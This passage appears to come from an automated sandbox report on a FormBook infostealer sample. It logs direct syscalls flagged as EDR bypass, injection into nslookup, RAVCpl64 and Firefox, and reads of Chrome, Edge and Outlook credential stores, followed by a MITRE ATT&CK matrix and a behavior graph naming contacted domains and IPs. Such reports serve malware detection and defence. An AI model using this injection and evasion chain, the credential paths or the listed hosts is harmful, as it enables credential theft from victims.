            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3703BDE0 mov eax, dword ptr fs:[00000030h]4_2_3703BDE0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3703BDE0 mov eax, dword ptr fs:[00000030h]4_2_3703BDE0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3703BDE0 mov eax, dword ptr fs:[00000030h]4_2_3703BDE0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3703BDE0 mov eax, dword ptr fs:[00000030h]4_2_3703BDE0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3703BDE0 mov eax, dword ptr fs:[00000030h]4_2_3703BDE0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3703BDE0 mov eax, dword ptr fs:[00000030h]4_2_3703BDE0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_3705FDE0 mov eax, dword ptr fs:[00000030h]4_2_3705FDE0
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370DFDF4 mov eax, dword ptr fs:[00000030h]4_2_370DFDF4
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370DFDF4 mov eax, dword ptr fs:[00000030h]4_2_370DFDF4
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370DFDF4 mov eax, dword ptr fs:[00000030h]4_2_370DFDF4
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370DFDF4 mov eax, dword ptr fs:[00000030h]4_2_370DFDF4
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370DFDF4 mov eax, dword ptr fs:[00000030h]4_2_370DFDF4
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370DFDF4 mov eax, dword ptr fs:[00000030h]4_2_370DFDF4
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370DFDF4 mov eax, dword ptr fs:[00000030h]4_2_370DFDF4
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370DFDF4 mov eax, dword ptr fs:[00000030h]4_2_370DFDF4
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370DFDF4 mov eax, dword ptr fs:[00000030h]4_2_370DFDF4
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370DFDF4 mov eax, dword ptr fs:[00000030h]4_2_370DFDF4
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370DFDF4 mov eax, dword ptr fs:[00000030h]4_2_370DFDF4
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 4_2_370DFDF4 mov eax, dword ptr fs:[00000030h]4_2_370DFDF4

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtAllocateVirtualMemory: Direct from: 0x708349Jump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x704441Jump to behavior
            Source: C:\Program Files (x86)\VzkvEFoeeutBCiNOgMNeWVeketbHNftcLthoiRTUYCPPDPVICvliBaXEIaTlKyXnfIhitiQY\29u7VPL5EWJRQ9.exeNtReadVirtualMemory: Direct from: 0x76F22DACJump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtCreateThreadEx: Direct from: 0x6FB92FJump to behavior
            Source: C:\Program Files (x86)\VzkvEFoeeutBCiNOgMNeWVeketbHNftcLthoiRTUYCPPDPVICvliBaXEIaTlKyXnfIhitiQY\29u7VPL5EWJRQ9.exeNtCreateFile: Direct from: 0x76F22F0CJump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x705AC4Jump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtQuerySystemInformation: Direct from: 0x7044DDJump to behavior
            Source: C:\Program Files (x86)\VzkvEFoeeutBCiNOgMNeWVeketbHNftcLthoiRTUYCPPDPVICvliBaXEIaTlKyXnfIhitiQY\29u7VPL5EWJRQ9.exeNtQueryVolumeInformationFile: Direct from: 0x76F22E4CJump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtQueryInformationToken: Direct from: 0x6FCCECJump to behavior
            Source: C:\Program Files (x86)\VzkvEFoeeutBCiNOgMNeWVeketbHNftcLthoiRTUYCPPDPVICvliBaXEIaTlKyXnfIhitiQY\29u7VPL5EWJRQ9.exeNtQueryValueKey: Direct from: 0x76F22B0CJump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x6FD2E3Jump to behavior
            Source: C:\Program Files (x86)\VzkvEFoeeutBCiNOgMNeWVeketbHNftcLthoiRTUYCPPDPVICvliBaXEIaTlKyXnfIhitiQY\29u7VPL5EWJRQ9.exeNtClose: Direct from: 0x76F22A8C
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtTerminateThread: Direct from: 0x7FFE87562651Jump to behavior
            Source: C:\Program Files (x86)\VzkvEFoeeutBCiNOgMNeWVeketbHNftcLthoiRTUYCPPDPVICvliBaXEIaTlKyXnfIhitiQY\29u7VPL5EWJRQ9.exeNtWriteVirtualMemory: Direct from: 0x76F2482CJump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtClose: Direct from: 0x7046D2
            Source: C:\Program Files (x86)\VzkvEFoeeutBCiNOgMNeWVeketbHNftcLthoiRTUYCPPDPVICvliBaXEIaTlKyXnfIhitiQY\29u7VPL5EWJRQ9.exeNtAllocateVirtualMemory: Direct from: 0x76F2480CJump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x6FB0BBJump to behavior
            Source: C:\Program Files (x86)\VzkvEFoeeutBCiNOgMNeWVeketbHNftcLthoiRTUYCPPDPVICvliBaXEIaTlKyXnfIhitiQY\29u7VPL5EWJRQ9.exeNtResumeThread: Direct from: 0x76F22EDCJump to behavior
            Source: C:\Program Files (x86)\VzkvEFoeeutBCiNOgMNeWVeketbHNftcLthoiRTUYCPPDPVICvliBaXEIaTlKyXnfIhitiQY\29u7VPL5EWJRQ9.exeNtQueryInformationProcess: Direct from: 0x76F22B46Jump to behavior
            Source: C:\Program Files (x86)\VzkvEFoeeutBCiNOgMNeWVeketbHNftcLthoiRTUYCPPDPVICvliBaXEIaTlKyXnfIhitiQY\29u7VPL5EWJRQ9.exeNtCreateUserProcess: Direct from: 0x76F2363CJump to behavior
            Source: C:\Program Files (x86)\VzkvEFoeeutBCiNOgMNeWVeketbHNftcLthoiRTUYCPPDPVICvliBaXEIaTlKyXnfIhitiQY\29u7VPL5EWJRQ9.exeNtProtectVirtualMemory: Direct from: 0x76F22EBCJump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x6FD3DAJump to behavior
            Source: C:\Program Files (x86)\VzkvEFoeeutBCiNOgMNeWVeketbHNftcLthoiRTUYCPPDPVICvliBaXEIaTlKyXnfIhitiQY\29u7VPL5EWJRQ9.exeNtDelayExecution: Direct from: 0x76F22CFCJump to behavior
            Source: C:\Program Files (x86)\VzkvEFoeeutBCiNOgMNeWVeketbHNftcLthoiRTUYCPPDPVICvliBaXEIaTlKyXnfIhitiQY\29u7VPL5EWJRQ9.exeNtOpenKeyEx: Direct from: 0x76F22ABCJump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x704634Jump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x6FD41EJump to behavior
            Source: C:\Program Files (x86)\VzkvEFoeeutBCiNOgMNeWVeketbHNftcLthoiRTUYCPPDPVICvliBaXEIaTlKyXnfIhitiQY\29u7VPL5EWJRQ9.exeNtAllocateVirtualMemory: Direct from: 0x76F22B1CJump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x70458CJump to behavior
            Source: C:\Program Files (x86)\VzkvEFoeeutBCiNOgMNeWVeketbHNftcLthoiRTUYCPPDPVICvliBaXEIaTlKyXnfIhitiQY\29u7VPL5EWJRQ9.exeNtReadFile: Direct from: 0x76F229FCJump to behavior
            Source: C:\Program Files (x86)\VzkvEFoeeutBCiNOgMNeWVeketbHNftcLthoiRTUYCPPDPVICvliBaXEIaTlKyXnfIhitiQY\29u7VPL5EWJRQ9.exeNtWriteVirtualMemory: Direct from: 0x76F22D5CJump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x6FC522Jump to behavior
            Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x6FD3ABJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: NULL target: C:\Program Files (x86)\VzkvEFoeeutBCiNOgMNeWVeketbHNftcLthoiRTUYCPPDPVICvliBaXEIaTlKyXnfIhitiQY\29u7VPL5EWJRQ9.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeSection loaded: NULL target: C:\Windows\SysWOW64\nslookup.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\nslookup.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\nslookup.exeThread register set: target process: 5928Jump to behavior
            Source: C:\Windows\SysWOW64\nslookup.exeThread register set: target process: 6196Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\nslookup.exeThread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeJump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeProcess created: C:\Users\user\Desktop\4DttVpYJtB.exe "C:\Users\user\Desktop\4DttVpYJtB.exe"Jump to behavior
            Source: C:\Program Files (x86)\VzkvEFoeeutBCiNOgMNeWVeketbHNftcLthoiRTUYCPPDPVICvliBaXEIaTlKyXnfIhitiQY\29u7VPL5EWJRQ9.exeProcess created: C:\Windows\SysWOW64\nslookup.exe "C:\Windows\SysWOW64\nslookup.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\nslookup.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\4DttVpYJtB.exeCode function: 2_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_00403640

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000006.00000002.400026261277.00000000030B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.400026547122.0000000003110000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.396747563920.0000000036ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.400025555468.0000000000B70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.396748461817.0000000037D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.400027902000.0000000003420000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\nslookup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\nslookup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\nslookup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\nslookup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\nslookup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\nslookup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\nslookup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\nslookup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\nslookup.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000006.00000002.400026261277.00000000030B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.400026547122.0000000003110000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.396747563920.0000000036ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.400025555468.0000000000B70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.396748461817.0000000037D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.400027902000.0000000003420000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API            		1
            DLL Side-Loading            		1
            Access Token Manipulation            		2
            Masquerading            		1
            OS Credential Dumping            		121
            Security Software Discovery            		Remote Services1
            Email Collection            		11
            Encrypted Channel            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts311
            Process Injection            		2
            Virtualization/Sandbox Evasion            		LSASS Memory2
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            Abuse Elevation Control Mechanism            		1
            Access Token Manipulation            		Security Account Manager1
            Process Discovery            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            DLL Side-Loading            		311
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object Model1
            Clipboard Data            		5
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets1
            System Network Configuration Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Abuse Elevation Control Mechanism            		Cached Domain Credentials3
            File and Directory Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
            Obfuscated Files or Information            		DCSync14
            System Information Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1634797 Sample: 4DttVpYJtB.exe Startdate: 11/03/2025 Architecture: WINDOWS Score: 100 34 www.publicblockchain.xyz 2->34 36 www.neixn.xyz 2->36 38 23 other IPs or domains 2->38 54 Suricata IDS alerts for network traffic 2->54 56 Antivirus detection for URL or domain 2->56 58 Antivirus / Scanner detection for submitted sample 2->58 62 5 other signatures 2->62 10 4DttVpYJtB.exe 59 2->10         started        signatures3 60 Performs DNS queries to domains with low reputation 36->60 process4 file5 30 C:\Users\user\AppData\Local\...\System.dll, PE32 10->30 dropped 32 C:\Users\user\AppData\Local\...\LangDLL.dll, PE32 10->32 dropped 74 Switches to a custom stack to bypass stack traces 10->74 14 4DttVpYJtB.exe 6 10->14         started        signatures6 process7 dnsIp8 46 drive.usercontent.google.com 142.250.65.193, 443, 49829 GOOGLEUS United States 14->46 48 drive.google.com 142.251.41.14, 443, 49828 GOOGLEUS United States 14->48 76 Maps a DLL or memory area into another process 14->76 18 29u7VPL5EWJRQ9.exe 14->18 injected signatures9 process10 signatures11 50 Uses nslookup.exe to query domains 18->50 52 Found direct / indirect Syscall (likely to bypass EDR) 18->52 21 nslookup.exe 13 18->21         started        process12 signatures13 64 Tries to steal Mail credentials (via file / registry access) 21->64 66 Tries to harvest and steal browser information (history, passwords, etc) 21->66 68 Modifies the context of a thread in another process (thread injection) 21->68 70 3 other signatures 21->70 24 RAVCpl64.exe 21->24 injected 28 firefox.exe 21->28         started        process14 dnsIp15 40 www.arasmm.info 47.83.1.90, 49835, 49836, 49837 VODANETInternationalIP-BackboneofVodafoneDE United States 24->40 42 www.essense.ltd 46.30.136.130, 49872, 49873, 49874 SYSTEMFORCE_ASGB United Kingdom 24->42 44 12 other IPs or domains 24->44 72 Found direct / indirect Syscall (likely to bypass EDR) 24->72 signatures16

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.